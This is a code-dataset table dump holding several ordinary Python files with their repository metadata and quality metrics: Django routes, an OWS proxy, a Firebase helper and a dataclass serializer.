hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
29c5b6d5e37c256dbd101b9f9d2e7691b0313aef | 494 | py | Python | Backend/core/users/urls.py | Extraordinary01/freshnesecom | e16047d7f8a8d771125c4656351bae2b4389a1a6 | [
"MIT"
] | null | null | null | Backend/core/users/urls.py | Extraordinary01/freshnesecom | e16047d7f8a8d771125c4656351bae2b4389a1a6 | [
"MIT"
] | null | null | null | Backend/core/users/urls.py | Extraordinary01/freshnesecom | e16047d7f8a8d771125c4656351bae2b4389a1a6 | [
"MIT"
] | null | null | null | from django.urls import path
from .views import UserRetrieveUpdateDestroyView, activate, register, CheckUserAPIView, custom_login, reset_password, reset_password_email
urlpatterns = [
    path("user/", UserRetrieveUpdateDestroyView.as_view()),
    path("signup/", register),
    path("check/", CheckUserAPIView.as_view()),
    path("login/", custom_login),
    path("activate/", activate),
    path("reset-password/email/", reset_password_email),
    path("reset-password/", reset_password)
]
| 38 | 138 | 0.738866 | 52 | 494 | 6.826923 | 0.403846 | 0.219718 | 0.152113 | 0.146479 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123482 | 494 | 12 | 139 | 41.166667 | 0.819861 | 0 | 0 | 0 | 0 | 0 | 0.139676 | 0.04251 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.272727 | 0.181818 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
29ed430dcb5413550cc35533f616785fbc2e32fa | 1,198 | py | Python | invenio_records_resources/resources/files/loaders.py | FlorianCassayre/invenio-records-resources | 80a2f6565653fd00e08c85b5aa8d1b1276cbb4e7 | [
"MIT"
] | null | null | null | invenio_records_resources/resources/files/loaders.py | FlorianCassayre/invenio-records-resources | 80a2f6565653fd00e08c85b5aa8d1b1276cbb4e7 | [
"MIT"
] | null | null | null | invenio_records_resources/resources/files/loaders.py | FlorianCassayre/invenio-records-resources | 80a2f6565653fd00e08c85b5aa8d1b1276cbb4e7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# Invenio-Records-Resources is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""Files loaders."""
from flask import request
from flask_resources.deserializers import DeserializerMixin
from flask_resources.loaders import RequestLoader
class StreamDeserializer(DeserializerMixin):
    """Stream deserializer."""

    def deserialize_data(self, data, *args, **kwargs):
        """Deserializes a stream."""
        return data


class RequestStreamLoader(RequestLoader):
    """Loaded request representation for streams."""

    def __init__(self, deserializer=None, args_parser=None, *args, **kwargs):
        """Constructor."""
        self.deserializer = deserializer or StreamDeserializer()
        self.args_parser = args_parser

    def load_data(self):
        """Load data from request stream."""
        return request.stream

    def load_item_request(self, *args, **kwargs):
        """Build request context."""
        return {
            "request_stream": request.stream,
            "request_content_length": request.content_length,
        }
| 28.52381 | 77 | 0.681135 | 131 | 1,198 | 6.099237 | 0.51145 | 0.065081 | 0.045056 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005274 | 0.208681 | 1,198 | 41 | 78 | 29.219512 | 0.837553 | 0.310518 | 0 | 0 | 0 | 0 | 0.045918 | 0.028061 | 0 | 0 | 0 | 0 | 0 | 1 | 0.235294 | false | 0 | 0.176471 | 0 | 0.705882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
29ef0c133b11ec2729d3f3fae560acaa93314a16 | 8,251 | py | Python | twitcher/owsproxy.py | Ouranosinc/twitcher | 78cd4806d98c75b408355db86d388134776471a7 | [
"Apache-2.0"
] | null | null | null | twitcher/owsproxy.py | Ouranosinc/twitcher | 78cd4806d98c75b408355db86d388134776471a7 | [
"Apache-2.0"
] | 7 | 2018-06-20T14:02:39.000Z | 2019-09-27T14:01:18.000Z | twitcher/owsproxy.py | Ouranosinc/twitcher | 78cd4806d98c75b408355db86d388134776471a7 | [
"Apache-2.0"
] | null | null | null | """
The owsproxy is based on `papyrus_ogcproxy <https://github.com/elemoine/papyrus_ogcproxy>`_
See also: https://github.com/nive/outpost/blob/master/outpost/proxy.py
"""
import urllib
import requests
from pyramid.response import Response
from pyramid.settings import asbool
from twitcher._compat import urlparse
from twitcher.owsexceptions import OWSAccessForbidden, OWSAccessFailed
from twitcher.utils import replace_caps_url
from twitcher.store import servicestore_factory
import logging
LOGGER = logging.getLogger(__name__)
allowed_content_types = (
    "application/xml",  # XML
    "text/xml",
    "text/xml;charset=ISO-8859-1",  # missing comma here previously concatenated this with the next entry
    "application/vnd.ogc.se_xml",  # OGC Service Exception
    "application/vnd.ogc.se+xml",  # OGC Service Exception
    # "application/vnd.ogc.success+xml",  # OGC Success (SLD Put)
    "application/vnd.ogc.wms_xml",  # WMS Capabilities
    # "application/vnd.ogc.gml",  # GML
    # "application/vnd.ogc.sld+xml",  # SLD
    "application/vnd.google-earth.kml+xml",  # KML
    "application/vnd.google-earth.kmz",
    "image/png",  # PNG
    "image/png;mode=32bit",
    "image/gif",  # GIF
    "image/jpeg",  # JPEG
    "application/json",  # JSON
    "application/json;charset=ISO-8859-1",
)
# TODO: configure allowed hosts
allowed_hosts = (
    # list allowed hosts here (no port limiting)
    # "localhost",
)
# requests.models.Response defaults its chunk size to 128 bytes, which is very slow
class BufferedResponse():
    def __init__(self, resp):
        self.resp = resp

    def __iter__(self):
        return self.resp.iter_content(64 * 1024)
def _send_request(request, service, extra_path=None, request_params=None):
    # TODO: fix way to build url
    url = service['url']
    if extra_path:
        url += '/' + extra_path
    if request_params:
        url += '?' + request_params
    LOGGER.debug('url = %s', url)

    # forward request to target (without Host Header)
    h = dict(request.headers)
    h.pop("Host", h)
    h['Accept-Encoding'] = None

    service_type = service['type']
    if service_type and (service_type.lower() != 'wps'):
        try:
            resp_iter = requests.request(method=request.method.upper(), url=url, data=request.body, headers=h,
                                         stream=True)
        except Exception as e:
            return OWSAccessFailed("Request failed: {}".format(e.message))

        # Headers meaningful only for a single transport-level connection
        HopbyHop = ['Connection', 'Keep-Alive', 'Public', 'Proxy-Authenticate', 'Transfer-Encoding', 'Upgrade']
        return Response(app_iter=BufferedResponse(resp_iter),
                        headers={k: v for k, v in resp_iter.headers.iteritems() if k not in HopbyHop})
    else:
        try:
            resp = requests.request(method=request.method.upper(), url=url, data=request.body, headers=h)
        except Exception as e:
            return OWSAccessFailed("Request failed: {}".format(e.message))

        if resp.ok is False:
            if 'ExceptionReport' in resp.content:
                pass
            else:
                return OWSAccessFailed("Response is not ok: {}".format(resp.reason))

        # check for allowed content types
        ct = None
        # LOGGER.debug("headers=", resp.headers)
        if "Content-Type" in resp.headers:
            ct = resp.headers["Content-Type"]
            if not ct.split(";")[0] in allowed_content_types:
                msg = "Content type is not allowed: {}.".format(ct)
                LOGGER.error(msg)
                return OWSAccessForbidden(msg)
        else:
            # return OWSAccessFailed("Could not get content type from response.")
            LOGGER.warn("Could not get content type from response")

        try:
            if ct in ['text/xml', 'application/xml', 'text/xml;charset=ISO-8859-1']:
                # replace urls in xml content
                proxy_url = request.route_url('owsproxy', service_name=service['name'])
                # TODO: where do i need to replace urls?
                content = replace_caps_url(resp.content, proxy_url, service.get('url'))
            else:
                # raw content
                content = resp.content
        except Exception:
            return OWSAccessFailed("Could not decode content.")

        headers = {}
        if ct:
            headers["Content-Type"] = ct
        return Response(content, status=resp.status_code, headers=headers)
def owsproxy_url(request):
    url = request.params.get("url")
    if url is None:
        return OWSAccessFailed("URL param is missing.")
    service_type = request.GET.get('service', 'wps') or request.GET.get('SERVICE', 'wps')
    # check for full url
    parsed_url = urlparse(url)
    if not parsed_url.netloc or parsed_url.scheme not in ("http", "https"):
        return OWSAccessFailed("Not a valid URL.")
    # _send_request reads service['type'], so the key must be "type", not "service_type"
    return _send_request(request, service=dict(url=url, name='external', type=service_type))
def owsproxy(request):
    """
    TODO: use ows exceptions
    """
    try:
        service_name = request.matchdict.get('service_name')
        extra_path = request.matchdict.get('extra_path')
        store = servicestore_factory(request.registry)
        service = store.fetch_by_name(service_name)
    except Exception as err:
        return OWSAccessFailed("Could not find service: {}.".format(err.message))
    else:
        return _send_request(request, service, extra_path, request_params=request.query_string)
def owsproxy_delegate(request):
    """
    Delegates owsproxy request to external twitcher service.
    """
    twitcher_url = request.registry.settings.get('twitcher.url')
    protected_path = request.registry.settings.get('twitcher.ows_proxy_protected_path', '/ows')
    url = twitcher_url + protected_path + '/proxy'
    if request.matchdict.get('service_name'):
        url += '/' + request.matchdict.get('service_name')
    if request.matchdict.get('access_token'):
        # append the token itself (previously appended service_name a second time)
        url += '/' + request.matchdict.get('access_token')
    url += '?' + urllib.urlencode(request.params)
    LOGGER.debug("delegate to owsproxy: %s", url)
    # forward request to target (without Host Header)
    # h = dict(request.headers)
    # h.pop("Host", h)
    resp = requests.request(method=request.method.upper(), url=url, data=request.body,
                            headers=request.headers, verify=False)
    return Response(resp.content, status=resp.status_code, headers=resp.headers)
def includeme(config):
    settings = config.registry.settings
    protected_path = settings.get('twitcher.ows_proxy_protected_path', '/ows')
    if asbool(settings.get('twitcher.ows_proxy', True)):
        LOGGER.debug('Twitcher {}/proxy enabled.'.format(protected_path))
        config.add_route('owsproxy', protected_path + '/proxy/{service_name}')
        # TODO: maybe configure extra path
        config.add_route('owsproxy_extra', protected_path + '/proxy/{service_name}/{extra_path:.*}')
        config.add_route('owsproxy_secured', protected_path + '/proxy/{service_name}/{access_token}')

        # use delegation mode?
        if asbool(settings.get('twitcher.ows_proxy_delegate', False)):
            LOGGER.debug('Twitcher {}/proxy delegation mode enabled.'.format(protected_path))
            config.add_view(owsproxy_delegate, route_name='owsproxy')
            config.add_view(owsproxy_delegate, route_name='owsproxy_secured')
        else:
            # include twitcher config
            config.include('twitcher.config')
            # include mongodb
            config.include('twitcher.db')
            config.add_view(owsproxy, route_name='owsproxy')
            config.add_view(owsproxy, route_name='owsproxy_secured')
            config.add_view(owsproxy, route_name='owsproxy_extra')

    # use /owsproxy?
    if asbool(settings.get('twitcher.ows_proxy_url', True)):
        LOGGER.debug('Twitcher /owsproxy enabled.')
        config.add_route('owsproxy_url', '/owsproxy')
        config.add_view(owsproxy_url, route_name='owsproxy_url')
| 39.478469 | 111 | 0.633863 | 963 | 8,251 | 5.296989 | 0.240914 | 0.023721 | 0.019996 | 0.024701 | 0.336013 | 0.278965 | 0.208783 | 0.142717 | 0.08861 | 0.08861 | 0 | 0.004353 | 0.248334 | 8,251 | 208 | 112 | 39.668269 | 0.818123 | 0.119016 | 0 | 0.101449 | 0 | 0 | 0.199079 | 0.064056 | 0 | 0 | 0 | 0.014423 | 0 | 0 | null | null | 0.007246 | 0.065217 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4b0387dd6595c147f8f9554794056d6e4ecf303e | 514 | py | Python | dusty/commands/shell.py | gamechanger/dusty | dd9778e3a4f0c623209e53e98aa9dc1fe76fc309 | [
"MIT"
] | 421 | 2015-06-02T16:29:59.000Z | 2021-06-03T18:44:42.000Z | dusty/commands/shell.py | gamechanger/dusty | dd9778e3a4f0c623209e53e98aa9dc1fe76fc309 | [
"MIT"
] | 404 | 2015-06-02T20:23:42.000Z | 2019-08-21T16:59:41.000Z | dusty/commands/shell.py | gamechanger/dusty | dd9778e3a4f0c623209e53e98aa9dc1fe76fc309 | [
"MIT"
] | 16 | 2015-06-16T17:21:02.000Z | 2020-03-27T02:27:09.000Z | from ..compiler.spec_assembler import get_specs
from . import utils
from ..systems.docker import get_dusty_container_name
def execute_shell(app_or_service_name):
    specs = get_specs()
    if app_or_service_name not in [spec.name for spec in specs.get_apps_and_services()]:
        raise KeyError('No app or service found named {}'.format(app_or_service_name))
    exec_options = utils.exec_docker_options()
    utils.exec_docker('exec', exec_options, get_dusty_container_name(app_or_service_name), '/bin/bash')
| 46.727273 | 103 | 0.780156 | 80 | 514 | 4.6375 | 0.45 | 0.067385 | 0.161725 | 0.172507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128405 | 514 | 10 | 104 | 51.4 | 0.828125 | 0 | 0 | 0 | 0 | 0 | 0.087549 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
4b0977a5ab8558b20c59dbf03ddb7ba67c5eb19b | 278 | py | Python | server/server/termsofuse/api/serializers.py | connectiveproject/connective | 8866082b2147feef0e5254ac4215987b9d881396 | [
"MIT"
] | 4 | 2021-07-05T10:49:26.000Z | 2021-11-24T11:34:43.000Z | server/server/termsofuse/api/serializers.py | connectiveproject/connective | 8866082b2147feef0e5254ac4215987b9d881396 | [
"MIT"
] | 39 | 2021-06-21T15:02:37.000Z | 2022-02-28T15:07:42.000Z | server/server/termsofuse/api/serializers.py | connectiveproject/connective | 8866082b2147feef0e5254ac4215987b9d881396 | [
"MIT"
] | 17 | 2021-06-16T08:59:45.000Z | 2021-09-29T11:35:38.000Z | from rest_framework import serializers
from ..models import TermsOfUseDocument
class TermsOfUseDocumentSerializer(serializers.ModelSerializer):
    class Meta:
        model = TermsOfUseDocument
        fields = ["document_text"]
        read_only_fields = ["document_text"]
| 25.272727 | 64 | 0.748201 | 25 | 278 | 8.12 | 0.68 | 0.137931 | 0.17734 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18705 | 278 | 10 | 65 | 27.8 | 0.89823 | 0 | 0 | 0 | 0 | 0 | 0.093525 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
4b18bec3031043bd614f7445f297413e4dc84dc1 | 1,108 | py | Python | PYPI python package/multivicks/crud.py | imvickykumar999/100th-Repository-Morsetor-python-Package | 6dce1df886e1ea0563a4cae53932b654d549315b | [
"MIT"
] | 2 | 2020-11-07T07:21:11.000Z | 2020-11-07T07:53:32.000Z | PYPI python package/multivicks/crud.py | imvickykumar999/100th-Repository-Morsetor-python-Package | 6dce1df886e1ea0563a4cae53932b654d549315b | [
"MIT"
] | null | null | null | PYPI python package/multivicks/crud.py | imvickykumar999/100th-Repository-Morsetor-python-Package | 6dce1df886e1ea0563a4cae53932b654d549315b | [
"MIT"
] | 1 | 2020-11-10T06:49:05.000Z | 2020-11-10T06:49:05.000Z |
# pip install imvickykumar999
# C:\Users\Vicky\anaconda3\Lib\site-packages\vicksbase
class HomeAutomation:
    def __init__(self, link):
        try:
            from vicksbase import firebase as f
            self.link = link
            self.firebase_obj = f.FirebaseApplication(self.link, None)
            print(self.pull(child='/'))
        except Exception as e:
            print(e)
            print('try: pip install imvickykumar999')

    def show(self):
        return self.link

    def pull(self, child='A/B/C/Switch'):
        result = self.firebase_obj.get(f'{child}', None)
        return result

    def push(self, data=1, child='A/B/C/Switch'):
        self.firebase_obj.put('/', child, data)
        return self.pull(child='/')

    def remove(self, child='A/B/C/led2'):
        data = self.firebase_obj.delete('/', child)
        return self.pull(child='/')
# link = 'https://led-blink-wifi-default-rtdb.firebaseio.com/'
# obj = HomeAutomation(link)
# f = obj.show()
# f = obj.pull()
# f = obj.push(1)
# f = obj.remove()
# print(f)
# input('Press Enter to Exit...')
| 25.181818 | 70 | 0.588448 | 144 | 1,108 | 4.472222 | 0.409722 | 0.049689 | 0.093168 | 0.037267 | 0.068323 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01218 | 0.259025 | 1,108 | 43 | 71 | 25.767442 | 0.772229 | 0.245487 | 0 | 0.095238 | 0 | 0 | 0.09466 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.238095 | false | 0 | 0.047619 | 0.047619 | 0.52381 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
4b19ea7ef02e099c43c87d4eeeed72882f3212a4 | 152 | py | Python | python_learning/check_num.py | liu0g/hello-World | 45eb76c56e082657d0f4af0a5eb49244b369a412 | [
"MIT"
] | null | null | null | python_learning/check_num.py | liu0g/hello-World | 45eb76c56e082657d0f4af0a5eb49244b369a412 | [
"MIT"
] | null | null | null | python_learning/check_num.py | liu0g/hello-World | 45eb76c56e082657d0f4af0a5eb49244b369a412 | [
"MIT"
] | null | null | null | __author__ = 'lg'
a = int(raw_input())
if a > 0:
    print('positive number')
elif a < 0:
    print('negative number')
else:
    print('the number is zero') | 16.888889 | 31 | 0.618421 | 23 | 152 | 3.869565 | 0.695652 | 0.044944 | 0.157303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017094 | 0.230263 | 152 | 9 | 31 | 16.888889 | 0.74359 | 0 | 0 | 0 | 0 | 0 | 0.326797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.375 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4b1d3dca6a1626c014a1c6d63353cec64b5b9b02 | 7,517 | py | Python | src/typefit/serialize.py | Xowap/typefit | a1beedcc4b05be6d22063719e7e2aa8c3f2c35b3 | [
"WTFPL"
] | 5 | 2019-10-28T15:40:03.000Z | 2021-03-16T21:07:25.000Z | src/typefit/serialize.py | Xowap/typefit | a1beedcc4b05be6d22063719e7e2aa8c3f2c35b3 | [
"WTFPL"
] | 32 | 2019-10-19T08:40:12.000Z | 2022-01-21T19:07:09.000Z | src/typefit/serialize.py | Xowap/typefit | a1beedcc4b05be6d22063719e7e2aa8c3f2c35b3 | [
"WTFPL"
] | 3 | 2019-10-28T15:42:49.000Z | 2022-01-18T19:18:06.000Z | from collections import ChainMap, abc
from dataclasses import fields, is_dataclass
from datetime import date, datetime
from enum import Enum
from json import dumps
from typing import Any, get_type_hints
from uuid import UUID
from .meta import Source
class Serializer:
    """
    Base serializer, that has no opinion and will serialize anything that is
    100% safe to serialize without making any assumption.

    Supported types are:

    - Numbers (int, float)
    - Booleans
    - Strings
    - Sequences
    - Mappings
    - Named (and typed) tuples
    - Dataclasses (including with Typefit metadata in the field)
    - Any object with a `__typefit_serialize__()` method
    - Enums

    You'll notice that the behavior of this class is a best effort to make
    something sane and simple. This means there is no warranty that this works:

    >>> base: SomeData = # Some data
    >>> serialized = serialize(base)
    >>> assert typefit(SomeData, serialized) == base

    If you want more types to be recognized by this serializer, you can inherit
    from it and extend the :py:meth:`~.Serializer.find_serializer()` method.
    If you don't know where to look, check out the following methods:

    - :py:meth:`~.typefit.serialize.Serializer.serialize`
    - :py:meth:`~.typefit.serialize.Serializer.json`

    See Also
    --------
    SaneSerializer
    """
    def find_serializer(self, obj: Any):
        """
        Trying to be as generic as possible. There are a few tricks there, like
        strings which are also sequences, so the order of tests matters quite a
        lot.

        Please override this if you want to change the behavior. See how it's
        done in :py:class:`~.typefit.serialize.SaneSerializer` for an idea
        on how to do it.
        """
        if hasattr(obj, "__typefit_serialize__"):
            return self.serialize_typefit
        elif isinstance(obj, (int, float, bool, str)) or obj is None:
            return self.serialize_generic
        elif isinstance(obj, tuple) and hasattr(obj, "_fields"):
            return self.serialize_tuple
        elif is_dataclass(obj):
            return self.serialize_dataclass
        elif isinstance(obj, abc.Sequence):
            return self.serialize_sequence
        elif isinstance(obj, abc.Mapping):
            return self.serialize_mapping
        elif isinstance(obj, Enum):
            return self.serialize_enum

    def serialize_generic(self, obj: Any) -> Any:
        """
        By default, leave the object untouched
        """
        return obj

    def serialize_tuple(self, obj: tuple):
        """
        Named tuples are expected to have typing annotations; we'll use that
        as a reference to get the fields list, however types are not enforced.
        """
        return {
            k: self.serialize(getattr(obj, k)) for k in get_type_hints(obj.__class__)
        }

    def serialize_sequence(self, obj: abc.Sequence):
        """
        Sequences are converted to regular lists, and each item of the list
        is recursively serialized.
        """
        return [self.serialize(x) for x in obj]

    def serialize_typefit(self, obj: Any):
        """
        Serializes an object by calling its `__typefit_serialize__()` method.
        """
        return obj.__typefit_serialize__()
    def serialize_dataclass(self, obj: Any):
        """
        Dataclasses are mappings but they merit special attention due to the
        fact that their fields are not necessarily the fields that will be
        used in the output, thanks to the `meta(source=X)` feature.

        Notes
        -----
        See :py:class:`~.typefit.meta.Source`, but basically the conversion to
        JSON structure generates a series of dictionaries that are then
        superposed into a single dictionary and returned.

        All values of this dictionary are of course recursively serialized.
        """

        def _get_values():
            for field in fields(obj.__class__):
                if field.metadata and "typefit_source" in field.metadata:
                    source: Source = field.metadata["typefit_source"]
                    yield {
                        k: self.serialize(v)
                        for k, v in source.value_to_json(field.name, obj).items()
                    }
                else:
                    yield {field.name: self.serialize(getattr(obj, field.name))}

        return dict(ChainMap(*_get_values()))

    def serialize_mapping(self, obj: abc.Mapping):
        """
        Mappings are just copied into another mapping. While copying, all the
        values are recursively serialized.
        """
        return {k: self.serialize(v) for k, v in obj.items()}

    def serialize_enum(self, obj: Enum):
        """
        Enums are serialized into their value.
        """
        return self.serialize(obj.value)
    def serialize(self, obj: Any):
        """
        Transforms a given object into a structure of basic types which can
        easily be serialized to JSON. It is not a strict inverse of
        :py:func:`~.typefit.typefit` but it should be good enough for most
        uses.

        Please note that this at least assumes that objects are consistent with
        their type declarations, no additional security is put in place.

        This method relies on the :py:meth:`~.Serializer.find_serializer()`
        method, which means that if you implement a subclass in order to
        change the mapping of serialization functions you should override
        :py:meth:`~.Serializer.find_serializer()`.

        Parameters
        ----------
        obj
            Object to be serialized
        """
        serializer = self.find_serializer(obj)
        return serializer(obj)

    def json(self, obj: Any) -> str:
        """
        Shortcut to transform an object into a JSON string going through
        :py:meth:`~.serialize`.
        """
        return dumps(self.serialize(obj))
class SaneSerializer(Serializer):
    """
    Opinionated version of what sane defaults for non-JSON-standard types
    should be. Comes as an extension of :py:class:`~.Serializer`.

    - Dates are serialized to the ISO format
    - UUIDs are serialized into their default str() representation
    """

    def find_serializer(self, obj: Any):
        """
        Tries to find special cases and if none of them are matched then
        resorts to the parent method.
        """
        if isinstance(obj, datetime):
            return self.serialize_std_datetime
        elif isinstance(obj, date):
            return self.serialize_std_date
        elif isinstance(obj, UUID):
            return self.serialize_uuid
        else:
            return super().find_serializer(obj)

    def serialize_uuid(self, obj: UUID):
        """
        UUIDs are simply converted to strings
        """
        return f"{obj}"

    def serialize_std_datetime(self, obj: datetime):
        """
        Datetimes are converted into ISO format
        """
        return obj.isoformat()

    def serialize_std_date(self, obj: date):
        """
        Dates are converted to ISO format
        """
        return obj.isoformat()


def serialize(obj: Any) -> Any:
    """
    Shortcut to use the :py:class:`~.typefit.serialize.SaneSerializer`'s
    :py:meth:`~.typefit.serialize.Serializer.serialize` method.

    Parameters
    ----------
    obj
        Object to be serialized
    """
    return SaneSerializer().serialize(obj)
